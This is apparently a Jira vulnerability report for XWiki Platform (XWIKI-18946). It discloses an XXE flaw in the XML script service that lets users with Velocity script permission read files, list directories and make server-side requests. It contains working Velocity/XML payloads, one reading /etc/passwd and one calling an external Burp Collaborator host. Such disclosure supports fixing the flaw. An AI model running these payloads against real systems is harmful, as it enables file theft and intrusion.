Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-18946

XML External Entity Injection (XXE) through XML script service

    XMLWordPrintable

    Details

    • Tests:
      Unit
    • Difficulty:
      Unknown
    • Documentation in Release Notes:
      N/A
    • Similar issues:

      Description

      Any user with velocity script permission can read arbitrary files, directory listing and Server-side request forgery.

      • Read arbitrary files payload: 
        {{velocity}}
        #set($xml=$services.get('xml'))
        #set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]><root><foo>&xxe;</foo></root>")
        #set($doc=$xml.parse($xxe_payload))
        $xml.serialize($doc)
        {{/velocity}}
      • Directory listing payload:

      {{velocity}}
      #set($xml=$services.get('xml'))
      #set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///' >]><root><foo>&xxe;</foo></root>")
      #set($doc=$xml.parse($xxe_payload))
      $xml.serialize($doc)
      {{/velocity}}

      • SSRF payload:

      {{velocity}}
      $services.get('xml').parse("<!DOCTYPE test [ <!ENTITY xxe SYSTEM 'http://ao2r99e546em76d8rliq7hcil9rzfo.burpcollaborator.net/a'> ]>
      <productId>&xxe;</productId >")
      {{/velocity}}

       

        Attachments

          Issue Links

            Activity

              People

              Assignee:
              tmortagne Thomas Mortagne
              Reporter:
              PetrusViet Petrus Viet (a member of VNG Security)
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

                Dates

                Created:
                Updated:
                Resolved:
                Date of First Response: